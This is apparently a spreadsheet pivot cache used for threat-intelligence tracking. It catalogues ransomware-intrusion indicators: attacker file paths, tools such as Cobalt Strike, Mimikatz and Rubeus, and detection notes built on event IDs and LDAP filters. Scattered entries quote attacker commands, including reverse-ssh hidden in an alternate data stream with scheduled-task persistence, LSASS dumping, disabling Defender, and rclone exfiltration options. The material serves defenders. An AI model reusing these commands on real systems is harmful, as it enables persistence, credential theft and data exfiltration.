  <r>
    <s v="file-eid0039"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\ProgramData\Seatbelt.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="file-eid0040"/>
    <m/>
    <m/>
    <m/>
    <s v="\\HOSTNAME\ADMIN$\ff49429.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="file-eid0041"/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Users\&lt;uname&gt;\AppData\LocalTemp\Faicury4.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\ShellExperiences\Windows Host.xml"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\WindowsHost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\Tasks\Windows Host"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Local\Microsoft\Windows\Fonts\Courie-BoldItalic.ttf"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\Templates\VideoDefault.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\PowerShell\System Update.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <s v="StartUp Persistence"/>
    <m/>
    <s v="C:\Users\[user]\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="“$user\$appdata\[random]\cmd.exe”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\Users\[user]\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="$user\$appdata\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="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">
  <r>
    <s v="generic-eid0001"/>
    <m/>
    <s v="process spawn "/>
    <m/>
    <m/>
    <m/>
    <s v="slv.py &gt;&gt; worksliv.py"/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0002"/>
    <m/>
    <m/>
    <s v="Advanced Ip Scanner"/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Sliver "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0004"/>
    <m/>
    <s v="Exfil"/>
    <s v="Restic"/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0005"/>
    <m/>
    <s v="Sliver DLL Exports "/>
    <m/>
    <m/>
    <m/>
    <s v="&quot;StartW_x000a_VoidFunc_x000a_DLLUnregisterServer_x000a_DllRegisterServer_x000a_DllInstall&quot;"/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0006"/>
    <m/>
    <s v="Sliver Github Strings Found in Memory "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0007"/>
    <m/>
    <m/>
    <s v="Impacket"/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0008"/>
    <m/>
    <s v="Cobalt Strike Beacon Injected into winlogon.exe and Used RDP"/>
    <m/>
    <m/>
    <m/>
    <s v="Inject into Winlogon.exe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0009"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0010"/>
    <m/>
    <m/>
    <m/>
    <s v="PowerView"/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0011"/>
    <m/>
    <m/>
    <s v="BloodHound"/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0012"/>
    <m/>
    <s v="Report has Cobalt Strike Configs"/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike C2 Config"/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0013"/>
    <m/>
    <s v="FOFA Query"/>
    <m/>
    <m/>
    <m/>
    <s v="&quot;HTTP/1.1 307 Temporary Redirect&quot; &amp;&amp; &quot;Content-Type: text/html; charset=utf-8&quot; &amp;&amp; &quot;Location: https://www.cloudflare.com/&quot; &amp;&amp; &quot;Content-Length: 63&quot; &amp;&amp; port=&quot;81&quot; &amp;&amp; protocol=&quot;http&quot;"/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0014"/>
    <m/>
    <s v="Masquerading pythonw.  Pythonw doesn't require a a GUI and when you run py or pyw you don't open a console window"/>
    <m/>
    <m/>
    <m/>
    <s v="pythonw.exe renamed to setup.exe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="generic-eid0015"/>
    <m/>
    <s v="Default Cobalt Strike Named Pipes"/>
    <m/>
    <m/>
    <m/>
    <s v="\postex_22a3 "/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0016"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0017"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Inject into Winlogon.exe"/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0018"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Inject into Rundll32.exe"/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0019"/>
    <m/>
    <s v="looking for the Domain-DNS Class(object) — Schema GUID: 19195a5b-6da0–11d0-afd3–00c04fd930c9 and DS-Replication-Get-Changes-All — Schema GUID: 1131f6ad-9c07–11d1-f79f-00c04fc2dcd2 as explained in this SpectreOps post, to detect this dcsync activity. Using these two points of evidence, we can say with good confidence that the threat actor performed a dcsync operation."/>
    <m/>
    <m/>
    <m/>
    <s v="dcsync"/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0020"/>
    <m/>
    <s v="LDAP Search"/>
    <m/>
    <m/>
    <m/>
    <s v="(&amp;(objectClass=computer))"/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0021"/>
    <m/>
    <m/>
    <s v="Impacket"/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0022"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0023"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Scanned ports 445, 3389, 135 "/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0024"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike C2 Config"/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0025"/>
    <m/>
    <s v="In another instance, we saw LSASS being accessed by WerFault.exe, with PROCESS_ALL_ACCESS granted. This should happen rarely in a production environment, and once again, the CallTrace can also help as CallTrace with ntdll.dll, dbghelp.dll or dbgcore.dll"/>
    <m/>
    <m/>
    <m/>
    <s v="Lsass Process Access WerFault"/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0026"/>
    <m/>
    <s v="Confirmed via windows event 5145"/>
    <m/>
    <m/>
    <m/>
    <s v="wmiexec.py checked share access "/>
    <x v="1"/>
  </r>
  <r>
    <s v="generic-eid0027"/>
    <m/>
    <m/>
    <s v="Rubeus"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="generic-eid0028"/>
    <m/>
    <s v="InnoDownLoad Plugin"/>
    <m/>
    <m/>
    <m/>
    <s v="http_request, url = IPADDRESS/manual/152/152/zip, http_method = GET, user_agent = InnoDownLoadPlugin/1.5&quot;}"/>
    <x v="2"/>
  </r>
  <r>
    <s v="generic-eid0029"/>
    <m/>
    <s v="MsBuild Netcon"/>
    <m/>
    <m/>
    <m/>
    <s v="netcon, file_path = c:\windows\microsoft.NET\framework\v4.0.30319\msbuild.exe, protocol = tcp , destination_ip = ipaddress"/>
    <x v="2"/>
  </r>
  <r>
    <s v="generic-eid0030"/>
    <m/>
    <s v="process spawn "/>
    <m/>
    <m/>
    <m/>
    <s v="SecTopRAT.exe &gt; cmd.exe &gt; msbuild.exe"/>
    <x v="2"/>
  </r>
  <r>
    <s v="generic-eid0031"/>
    <m/>
    <m/>
    <s v="InnoSetup"/>
    <m/>
    <m/>
    <s v="idp.dll"/>
    <x v="2"/>
  </r>
  <r>
    <s v="generic-eid0032"/>
    <m/>
    <s v="MsBuild Netcon"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="generic-eid0033"/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <s v="psexec_psh"/>
    <x v="2"/>
  </r>
  <r>
    <s v="generic-eid0034"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <s v="netcon, file_path = c:\windows\microsoft.NET\framework\v4.0.30319\msbuild.exe,  protocol = tcp,  destination_ip = ipaddress"/>
    <x v="2"/>
  </r>
  <r>
    <s v="generic-eid0035"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="{&quot;object&quot;: &quot;reg_set&quot;, &quot;target&quot;: &quot;HKU\&lt;user&gt;\Software\Microsoft\Windows\CurrentVersion\Run\socks5&quot;, &quot;file_name&quot;: &quot;c:\user\socks32.exe&quot;}"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0036"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0037"/>
    <m/>
    <m/>
    <s v="BloodHound"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0038"/>
    <m/>
    <m/>
    <s v="SharpHound"/>
    <m/>
    <m/>
    <s v="winevtx_4768, service_name = krbtgt, pre_auth_type = 0, ticket_type = 0x17"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0039"/>
    <m/>
    <s v="Ldap Search/Bloodhound"/>
    <m/>
    <m/>
    <m/>
    <s v="(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913))&quot;, &quot;(BuildString(&quot;(primarygroupid=*)"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0040"/>
    <m/>
    <s v="Bloodhound"/>
    <m/>
    <m/>
    <m/>
    <s v="ldap_search, search_filter = (|samaccounttype=805306369)(samaccounttype=805306369(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913))(objectcategory=organizationalUnit)(objectclass=container)"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0041"/>
    <m/>
    <m/>
    <s v="Adfind"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0042"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Get-DataInfo.ps1"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0043"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="used SMB ADMIN$ share "/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0044"/>
    <m/>
    <s v="Sharphound SMB "/>
    <m/>
    <m/>
    <m/>
    <s v="winevtx_5145, share_name = \\*\C$, target_name = tools\socks32.exe"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0045"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="winevtx_5145, share_name = \\*\IPC$, target_name = srvsvc"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0046"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="winevtx_5145 = share_name = \\*\IPC$, target_name = samr"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0047"/>
    <m/>
    <s v="Kerb Roasting Generated a lot of 4768"/>
    <m/>
    <m/>
    <m/>
    <s v="TicketEncryptionType = 0x17, PreAuthType = 0, 25+ logs"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0048"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="powershell connected to port 80 in netcon"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0049"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="rundll32.exe netcon to port 443"/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0050"/>
    <m/>
    <s v="Report has Cobalt Strike Configs"/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0051"/>
    <m/>
    <m/>
    <s v="Rubeus"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="generic-eid0052"/>
    <m/>
    <s v="&quot;During the BlackCat attack, the actors used a tool called reverse-ssh, compiled with the C2 server address embedded, to set up reverse SSH tunnels and provide reverse shells to the attacker. Reverse-ssh was deployed to C:\ directory and named: system, Windows or cache task._x000a__x000a_It was also observed hidden by writing to an alternate data stream (ADS) of the C:\ directory using the following command:&quot;"/>
    <m/>
    <m/>
    <m/>
    <s v="&quot;c:\windows\system32\windowspowershell\v1.0\powershell.exe -command  &amp; {(get-content c:\system -raw | set-content c:\ -stream 'cachetask')}_x000a__x000a_c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f_x000a__x000a_c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask&quot;"/>
    <x v="4"/>
  </r>
  <r>
    <s v="generic-eid0053"/>
    <m/>
    <m/>
    <s v="Impacket"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="generic-eid0054"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="generic-eid0055"/>
    <m/>
    <m/>
    <s v="ADRecon"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="generic-eid0056"/>
    <m/>
    <m/>
    <s v="Gmer"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="generic-eid0057"/>
    <m/>
    <m/>
    <s v="HackBrowserData"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="generic-eid0058"/>
    <m/>
    <s v="LSASS Dump Manual with Taskmgr"/>
    <m/>
    <m/>
    <m/>
    <s v="Instead, they opened Taskmgr.exe, created a dump file of the LSASS.exe process, and saved the file to a ZIP archive."/>
    <x v="5"/>
  </r>
  <r>
    <s v="generic-eid0059"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Get-ADRGPO, Get-ADRDNSZone, Get-ADRGPLink"/>
    <x v="5"/>
  </r>
  <r>
    <s v="generic-eid0060"/>
    <m/>
    <m/>
    <s v="Nirsoft"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0061"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0062"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0063"/>
    <m/>
    <m/>
    <s v="ADRecon"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0064"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0065"/>
    <m/>
    <m/>
    <s v="Emotet"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0066"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0067"/>
    <m/>
    <m/>
    <s v="BloodHound"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0068"/>
    <m/>
    <m/>
    <s v="CrackMapExec"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0069"/>
    <m/>
    <m/>
    <s v="MegaSync"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0070"/>
    <m/>
    <m/>
    <s v="InVeigh"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0071"/>
    <m/>
    <m/>
    <s v="Adfind"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0072"/>
    <m/>
    <m/>
    <s v="Rubeus"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0073"/>
    <m/>
    <m/>
    <s v="StealBit"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0074"/>
    <m/>
    <s v="LSASS Dump Manual with Taskmgr"/>
    <m/>
    <m/>
    <m/>
    <s v="Instead, they opened Taskmgr.exe, created a dump file of the LSASS.exe process, and saved the file to a ZIP archive."/>
    <x v="6"/>
  </r>
  <r>
    <s v="generic-eid0075"/>
    <m/>
    <m/>
    <s v="Mega"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="generic-eid0076"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="generic-eid0077"/>
    <m/>
    <m/>
    <s v="Plink"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="generic-eid0078"/>
    <m/>
    <m/>
    <s v="Ngrok"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="generic-eid0079"/>
    <m/>
    <m/>
    <s v="SplashTop"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="generic-eid0080"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Brute Ratel"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="generic-eid0081"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="generic-eid0082"/>
    <m/>
    <m/>
    <s v="Evilginx2"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="generic-eid0083"/>
    <m/>
    <s v="LSASS Dump Manual with Taskmgr"/>
    <m/>
    <m/>
    <m/>
    <s v="&quot;Dump using GUI while TA is on RDP_x000a_taskmgr_x000a_Open taskmgr_x000a_Go to process lsass_x000a_“Create Dump File”&quot;"/>
    <x v="8"/>
  </r>
  <r>
    <s v="generic-eid0084"/>
    <m/>
    <m/>
    <s v="Gmer"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="generic-eid0085"/>
    <m/>
    <m/>
    <s v="pchunter"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="generic-eid0086"/>
    <m/>
    <m/>
    <s v="PowerTool/64"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="generic-eid0087"/>
    <m/>
    <m/>
    <s v="RouterScan.exe"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="generic-eid0088"/>
    <m/>
    <m/>
    <s v="PowerView"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="generic-eid0089"/>
    <m/>
    <m/>
    <s v="Rubeus"/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="generic-eid0090"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="generic-eid0091"/>
    <m/>
    <s v="Exloited Netlogon"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="generic-eid0092"/>
    <m/>
    <s v="process spawn "/>
    <m/>
    <m/>
    <m/>
    <s v="psexesvc.exe &gt; rundll32.exe &gt; cmd.exe"/>
    <x v="11"/>
  </r>
  <r>
    <s v="generic-eid0093"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="generic-eid0094"/>
    <m/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="generic-eid0095"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="generic-eid0096"/>
    <m/>
    <m/>
    <s v="ProcDump"/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="generic-eid0097"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="http_request, url = IP/cert/bec_http_222_x86_13567_1.exe, http_method = GET, user_agent = curl/7.74.0"/>
    <x v="12"/>
  </r>
  <r>
    <s v="generic-eid0098"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="gpedit.msc Select &quot;Disable real-time protection&quot; and change it to &quot;Enabled&quot;"/>
    <x v="13"/>
  </r>
  <r>
    <s v="generic-eid0099"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Use of Cobalt Strike EXECUTE-ASSEMBLY to execute .net in memory "/>
    <x v="13"/>
  </r>
  <r>
    <s v="generic-eid0100"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="https://mega.io/sync "/>
    <x v="13"/>
  </r>
  <r>
    <s v="generic-eid0101"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\ProgramData\lsass.dmp full&quot; remote-exec psexec [target] cmd /c rundll32.exe"/>
    <x v="13"/>
  </r>
  <r>
    <s v="generic-eid0102"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="powershell-import //import file CVE-2021-34527.ps1"/>
    <x v="13"/>
  </r>
  <r>
    <s v="generic-eid0103"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="generic-eid0104"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="generic-eid0105"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="generic-eid0106"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="commandline = svchost.exe -k UnistackSvcGroup -s WpnUserService, netcon 445"/>
    <x v="14"/>
  </r>
  <r>
    <s v="generic-eid0107"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0108"/>
    <m/>
    <s v="rclone"/>
    <m/>
    <m/>
    <m/>
    <s v="&quot;&quot;&quot;CMDline args _x000a_- copy: Copy the source to the destination _x000a_- --max-age: Only transfer files younger than &lt;time&gt; _x000a_- \\&lt;redacted&gt;B: From source _x000a_- remote: &lt;redacted&gt;\&lt;redacted&gt;: To destination folder _x000a_- Bwlimit 2M: Bandwidth limit _x000a_- -q: quiet _x000a_- --ignore-existing: Skip all files that exist on destination _x000a_- --auto-confirm: Do not request console confirmation _x000a_- --multi-thread-streams: Max number of streams to use for multi-thread downloads _x000a_- --transfers: Number of file transfers to run in parallel _x000a_- -P: Show progress&quot;&quot;&quot;"/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0109"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0110"/>
    <m/>
    <m/>
    <s v="Advanced Ip Scanner"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0111"/>
    <m/>
    <m/>
    <s v="Seatbelt"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0112"/>
    <m/>
    <m/>
    <s v="Rclone"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0113"/>
    <m/>
    <m/>
    <s v="Mega"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0114"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0115"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="Injected in mstsc.exe, searchindexer.exe, rundll32.exe"/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0116"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Scan 445, 3389, 135, 21"/>
    <x v="15"/>
  </r>
  <r>
    <s v="generic-eid0117"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="netlogon exploited"/>
    <x v="16"/>
  </r>
  <r>
    <s v="generic-eid0118"/>
    <m/>
    <m/>
    <s v="Atera Agent"/>
    <m/>
    <m/>
    <s v="AteraAgent.exe"/>
    <x v="17"/>
  </r>
  <r>
    <s v="generic-eid0119"/>
    <m/>
    <m/>
    <s v="SplashTop"/>
    <m/>
    <m/>
    <s v="SplashtopStreamer3360.exe"/>
    <x v="17"/>
  </r>
  <r>
    <s v="generic-eid0120"/>
    <m/>
    <s v="Named Pipe"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="pipeName: \MSSE-3328-server and Image: 61582ab.exe_x000a_pipeName: \MSSE-7344-server and Image: 044b7e1.exe"/>
    <x v="17"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="regsvr32.exe created remote thread to winlogon.exe"/>
    <x v="17"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="winlogon.exe made DNS query"/>
    <x v="17"/>
  </r>
  <r>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v=".dll or regsvr32.exe connecting to internet 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651AB4-6668-E04C-AE05-A469DFE9C74D}" name="PivotTable1" cacheId="4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2" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="12"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m="1" x="18"/>
        <item x="17"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="1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lta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_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23DE75-AE98-E44F-BAB0-EBEF926044F6}" name="PivotTable2" cacheId="4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0" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="11"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lta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_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1E2462-842F-E848-A822-99B1A4557465}" name="PivotTable3" cacheId="4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3" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="10"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lta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_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2A2247-37C7-B146-8C14-B1A4D372E94E}" name="PivotTable4" cacheId="4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2" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="8">
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/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m="1" x="18"/>
